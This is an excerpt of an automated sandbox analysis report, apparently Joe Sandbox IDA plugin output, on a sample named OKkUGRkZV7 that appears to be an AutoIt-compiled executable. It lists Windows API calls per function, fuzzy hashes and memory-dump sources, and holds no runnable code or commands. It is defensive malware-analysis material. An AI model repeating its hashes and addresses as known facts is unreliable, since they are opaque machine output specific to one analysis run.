                                              • Instruction ID: e5731f6acfb206bc074afbace39c3bc9ef32a5bc54be1774bb184427ea3c021b
                                              • Opcode Fuzzy Hash: 20cb189f165e890caa742136586d450f31f66aa90a818eb7c28f59e7128a12f3
                                              • Instruction Fuzzy Hash: 08D05B7954030D6FDB519B90DC0DFEA773CD704700F0006B1FB54D1091DA7065548B91
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 520f28c805d5b1faf6a8489b914900756ca30626c9cbfad81005b39d8dbfc7fd
                                              • Instruction ID: d8d805587ed861408fd26fa3d90965cced4ff3437b4cadd5e0302c94870f5250
                                              • Opcode Fuzzy Hash: 520f28c805d5b1faf6a8489b914900756ca30626c9cbfad81005b39d8dbfc7fd
                                              • Instruction Fuzzy Hash: 43F16B746083009FCB25DF28C480A6ABBE5FF89318F14896EF9999B351D730E945CF82
                                              APIs
                                              • _memset.LIBCMT ref: 00344370
                                              • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00344415
                                              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00344432
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: IconNotifyShell_$_memset
                                              • String ID:
                                              • API String ID: 1505330794-0
                                              • Opcode ID: ef438f445b52b6c7baab905c643a5438d8fcbc53a2798751c36ffa8d8fc20a68
                                              • Instruction ID: 9943573bf5872e46f5bb746f59258e5346dede7aea19bed33f79336f10f3d980
                                              • Opcode Fuzzy Hash: ef438f445b52b6c7baab905c643a5438d8fcbc53a2798751c36ffa8d8fc20a68
                                              • Instruction Fuzzy Hash: 8C317AB05057018FC722DF24D884B9BBBF8FF48708F00093EE69A9A251E770A944CB96
                                              APIs
                                              • __FF_MSGBANNER.LIBCMT ref: 00365733
                                                • Part of subcall function 0036A16B: __NMSG_WRITE.LIBCMT ref: 0036A192
                                                • Part of subcall function 0036A16B: __NMSG_WRITE.LIBCMT ref: 0036A19C
                                              • __NMSG_WRITE.LIBCMT ref: 0036573A
                                                • Part of subcall function 0036A1C8: GetModuleFileNameW.KERNEL32(00000000,004033BA,00000104,?,00000001,00000000), ref: 0036A25A
                                                • Part of subcall function 0036A1C8: ___crtMessageBoxW.LIBCMT ref: 0036A308
                                                • Part of subcall function 0036309F: ___crtCorExitProcess.LIBCMT ref: 003630A5
                                                • Part of subcall function 0036309F: ExitProcess.KERNEL32 ref: 003630AE
                                                • Part of subcall function 00368B28: __getptd_noexit.LIBCMT ref: 00368B28
                                              • RtlAllocateHeap.NTDLL(015F0000,00000000,00000001,00000000,?,?,?,00360DD3,?), ref: 0036575F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                              • String ID:
                                              • API String ID: 1372826849-0
                                              • Opcode ID: 11d6d23cab7aaaf6795d176bb4da595120b656208b75321c09b9e4bd5187e7e1
                                              • Instruction ID: fe428e74864ade12edf8e0d020e001b162799db9f581b75fd37d252e1983a3d6
                                              • Opcode Fuzzy Hash: 11d6d23cab7aaaf6795d176bb4da595120b656208b75321c09b9e4bd5187e7e1
                                              • Instruction Fuzzy Hash: 1101B135240B01DED6133B39EC92A2E778C9B82762F21853AF505AF2CADFB09C004665
                                              APIs
                                              • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,003A9548,?,?,?,?,?,00000004), ref: 003A98BB
                                              • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,003A9548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 003A98D1
                                              • CloseHandle.KERNEL32(00000000,?,003A9548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 003A98D8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: File$CloseCreateHandleTime
                                              • String ID:
                                              • API String ID: 3397143404-0
                                              • Opcode ID: 019bc84b8cadfdf9b893be0f94ed861fd07299f87610093a39b46c5452f91d7d
                                              • Instruction ID: f2c6a46f0cbfdb206c90da058942020aedaadbf6100e85139cf9000c1c1dcbad
                                              • Opcode Fuzzy Hash: 019bc84b8cadfdf9b893be0f94ed861fd07299f87610093a39b46c5452f91d7d
                                              • Instruction Fuzzy Hash: 06E08632141214BBD7232B54EC09FDA7B1EEB06760F144221FB14B90E087B125119798
                                              APIs
                                              • _free.LIBCMT ref: 003A8D1B
                                                • Part of subcall function 00362D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00369A24), ref: 00362D69
                                                • Part of subcall function 00362D55: GetLastError.KERNEL32(00000000,?,00369A24), ref: 00362D7B
                                              • _free.LIBCMT ref: 003A8D2C
                                              • _free.LIBCMT ref: 003A8D3E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast
                                              • String ID:
                                              • API String ID: 776569668-0
                                              • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                              • Instruction ID: e6e6b3f99d924059397f329faa5d2134686a5525e6233d80333ffa7ff4749fd4
                                              • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                              • Instruction Fuzzy Hash: 55E012A1601A014ACB26A778A940A9363DC9F59352716491DB46DEB18ADE64F8428124
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: CALL
                                              • API String ID: 0-4196123274
                                              • Opcode ID: 64a66ddff7ee7a6e600b16fdbe7f739d4b118f2533e9462eded6bc390acabb49
                                              • Instruction ID: 23d650859c0add4e19b20d86fbc0fe72098bcb1850ddfb4f9f11d18e6fa2f0c8
                                              • Opcode Fuzzy Hash: 64a66ddff7ee7a6e600b16fdbe7f739d4b118f2533e9462eded6bc390acabb49
                                              • Instruction Fuzzy Hash: 23225770608701DFCB26DF14C491A2AB7E5FF85304F15896DE89A9F262D735EC85CB82
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: _memmove
                                              • String ID:
                                              • API String ID: 4104443479-0
                                              • Opcode ID: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
                                              • Instruction ID: 462fc9e5272a08fa7bbceacb7ba8f13ef6c6f69cf7e848045397efce91565fd0
                                              • Opcode Fuzzy Hash: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
                                              • Instruction Fuzzy Hash: 0A316FB1604606AFC715DF68D891E69B3E9FF483207158629E519CF791EB30F960CB90
                                              APIs
                                              • IsThemeActive.UXTHEME ref: 00344834
                                                • Part of subcall function 0036336C: __lock.LIBCMT ref: 00363372
                                                • Part of subcall function 0036336C: DecodePointer.KERNEL32(00000001,?,00344849,00397C74), ref: 0036337E
                                                • Part of subcall function 0036336C: EncodePointer.KERNEL32(?,?,00344849,00397C74), ref: 00363389
                                                • Part of subcall function 003448FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00344915
                                                • Part of subcall function 003448FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0034492A
                                                • Part of subcall function 00343B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00343B68
                                                • Part of subcall function 00343B3A: IsDebuggerPresent.KERNEL32 ref: 00343B7A
                                                • Part of subcall function 00343B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,004052F8,004052E0,?,?), ref: 00343BEB
                                                • Part of subcall function 00343B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00343C6F
                                              • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00344874
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                              • String ID:
                                              • API String ID: 1438897964-0
                                              • Opcode ID: 8d43a570cb64182e7ba2ee273ee5ea8710ad6a4110da480f31e302175b104923
                                              • Instruction ID: 431153d9e01787c68dbd5bec3596ad72c80f8445593bbbb8dc7784071e61b658
                                              • Opcode Fuzzy Hash: 8d43a570cb64182e7ba2ee273ee5ea8710ad6a4110da480f31e302175b104923
                                              • Instruction Fuzzy Hash: F1118C719083059FC701DF28D945A0FBBE8EF85750F10452EF041AB2B1DBB0A954CF96
                                              APIs
                                                • Part of subcall function 0036571C: __FF_MSGBANNER.LIBCMT ref: 00365733
                                                • Part of subcall function 0036571C: __NMSG_WRITE.LIBCMT ref: 0036573A
                                                • Part of subcall function 0036571C: RtlAllocateHeap.NTDLL(015F0000,00000000,00000001,00000000,?,?,?,00360DD3,?), ref: 0036575F
                                              • std::exception::exception.LIBCMT ref: 00360DEC
                                              • __CxxThrowException@8.LIBCMT ref: 00360E01
                                                • Part of subcall function 0036859B: RaiseException.KERNEL32(?,?,?,003F9E78,00000000,?,?,?,?,00360E06,?,003F9E78,?,00000001), ref: 003685F0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                              • String ID:
                                              • API String ID: 3902256705-0
                                              • Opcode ID: 5bff39cfa7816052080228a3240d374480ddeb2a785ffcd383199f6b6e78babf
                                              • Instruction ID: 7a40f65f548ed55c93cf02b118a43e5042f2a5c9d4f1f19aaa532eb0b9f5fe6c
                                              • Opcode Fuzzy Hash: 5bff39cfa7816052080228a3240d374480ddeb2a785ffcd383199f6b6e78babf
                                              • Instruction Fuzzy Hash: ECF0287650031D66CB17BB95EC02ADF7BAC9F15311F108526FD189A289DFB19A40C2D1
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: __lock_file_memset
                                              • String ID:
                                              • API String ID: 26237723-0
                                              • Opcode ID: 1fe0a7773ae174da7688353143dbf989e03a4360fd42f749928f24d3506ae0e2
                                              • Instruction ID: 727095f3e9e1105590fa57663a7cc804e3b72255babf5e04c946c65c04dae5d6
                                              • Opcode Fuzzy Hash: 1fe0a7773ae174da7688353143dbf989e03a4360fd42f749928f24d3506ae0e2
                                              • Instruction Fuzzy Hash: AC01F771800A08EBCF13AF69DC028AE7B61AF50361F41C225F8241F199DB718A11DFA1
                                              APIs
                                                • Part of subcall function 00368B28: __getptd_noexit.LIBCMT ref: 00368B28
                                              • __lock_file.LIBCMT ref: 003653EB
                                                • Part of subcall function 00366C11: __lock.LIBCMT ref: 00366C34
                                              • __fclose_nolock.LIBCMT ref: 003653F6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                              • String ID:
                                              • API String ID: 2800547568-0
                                              • Opcode ID: 40a13043c3675881375eb4f9461b1b8dde9900a53821d395dcef09bb655ddb65
                                              • Instruction ID: a9960116f1e6288233470dea5167a54e3d44202e901d6b8837a6d8dcda38d65c
                                              • Opcode Fuzzy Hash: 40a13043c3675881375eb4f9461b1b8dde9900a53821d395dcef09bb655ddb65
                                              • Instruction Fuzzy Hash: 41F09671800A059ADB136F6598027AD7AE06F41774F35C319E424AF2C9CFBC49419B51
                                              APIs
                                                • Part of subcall function 01694910: GetFileAttributesW.KERNELBASE(?), ref: 0169491B
                                              • CreateDirectoryW.KERNELBASE(?,00000000), ref: 01695205
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355885515.0000000001694000.00000040.00000020.00020000.00000000.sdmp, Offset: 01694000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1694000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: AttributesCreateDirectoryFile
                                              • String ID:
                                              • API String ID: 3401506121-0
                                              • Opcode ID: 8b1c7563f997010c8cb8e7eb47c063bef6c3542d808756ee285f79c16ecb0b7f
                                              • Instruction ID: 69a306d2764b81b70cb2880dc9186c97a64535f7a3e8042f3c93b3b1a78cca64
                                              • Opcode Fuzzy Hash: 8b1c7563f997010c8cb8e7eb47c063bef6c3542d808756ee285f79c16ecb0b7f
                                              • Instruction Fuzzy Hash: E3516E31A1020997EF14DFA4D854BEE737AFF58300F00856DE609E7290EB759A45C7A5
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: ProtectVirtual
                                              • String ID:
                                              • API String ID: 544645111-0
                                              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                              • Instruction ID: ad6915fd89b7503fc063a0e8f439e4519d5b14d072d1c79b3466c1e74706038a
                                              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                              • Instruction Fuzzy Hash: 3831E070A001059FC71ADF48C486A6AFBB6FB49300B25C6A5E80ACF759DB31EDD1DB90
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: ClearVariant
                                              • String ID:
                                              • API String ID: 1473721057-0
                                              • Opcode ID: 37774f10c01b2d96019bb3af34ff6be684d20039d7083ddbecf907c4fbb05ac4
                                              • Instruction ID: 45b2c9f108318b90d74cbfdee242a2864d86dd664c6fc2d4fa596bcf3d14e72c
                                              • Opcode Fuzzy Hash: 37774f10c01b2d96019bb3af34ff6be684d20039d7083ddbecf907c4fbb05ac4
                                              • Instruction Fuzzy Hash: 4841F3746087518FDB26DF14C494B1ABBE1BF45318F0988ACE8998B762C736FC45CB52
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: _memmove
                                              • String ID:
                                              • API String ID: 4104443479-0
                                              • Opcode ID: e886819d3f6e044e098e9c9e7f01cc26c8f53719d4f6f569ecf1baea26ddc641
                                              • Instruction ID: 35cb93b79d0e1b97dbe6e1c0871cd79fa76b1470fd2db256dcca1e8975d7522f
                                              • Opcode Fuzzy Hash: e886819d3f6e044e098e9c9e7f01cc26c8f53719d4f6f569ecf1baea26ddc641
                                              • Instruction Fuzzy Hash: 54210872614A09EBDB278F15E84177A7BF8FB18350F21C56EE449C91A0EB3091D0D745
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f0a7fdcf8f26cf7499cf53811273db1d038b19e08a758a41fabadd13cc4981c7
                                              • Instruction ID: 47d996a051046e28276ae12d9842644ee1e03908dbb10dfa4453b0ca76536535
                                              • Opcode Fuzzy Hash: f0a7fdcf8f26cf7499cf53811273db1d038b19e08a758a41fabadd13cc4981c7
                                              • Instruction Fuzzy Hash: FE210535109B50AFC7338F24D842AE7BBE8EF42311B0185BEF8488BD55D7344AA5CBA1
                                              APIs
                                                • Part of subcall function 00344BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00344BEF
                                                • Part of subcall function 0036525B: __wfsopen.LIBCMT ref: 00365266
                                              • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004052F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00344E0F
                                                • Part of subcall function 00344B6A: FreeLibrary.KERNEL32(00000000), ref: 00344BA4
                                                • Part of subcall function 00344C70: _memmove.LIBCMT ref: 00344CBA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Library$Free$Load__wfsopen_memmove
                                              • String ID:
                                              • API String ID: 1396898556-0
                                              • Opcode ID: 882dde8a0dacb5b476d977cb304547aefbc0aa05fafd553de23307d3e3f07a9c
                                              • Instruction ID: 5649d42aa68ad503735dc54581d0379c21dc689babb9ea63a0b1e2f61870ff9c
                                              • Opcode Fuzzy Hash: 882dde8a0dacb5b476d977cb304547aefbc0aa05fafd553de23307d3e3f07a9c
                                              • Instruction Fuzzy Hash: 4E11A331600205ABCF27AF70D816FAD77E9EF44710F108839F541AF181EA75AE559B51
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: ClearVariant
                                              • String ID:
                                              • API String ID: 1473721057-0
                                              • Opcode ID: e808ccd9a958540cf11c380576508a1a0f8c08c9294c65a071cf3dabd39b74c8
                                              • Instruction ID: 5138e0ac444cb0f8980286bd97e470c7a41474ac311e47054443ef5433e6e8ff
                                              • Opcode Fuzzy Hash: e808ccd9a958540cf11c380576508a1a0f8c08c9294c65a071cf3dabd39b74c8
                                              • Instruction Fuzzy Hash: 93210474A08701DFCB16DF64C444A1ABBE5BF85314F05896CE8899B761D731F809CB92
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
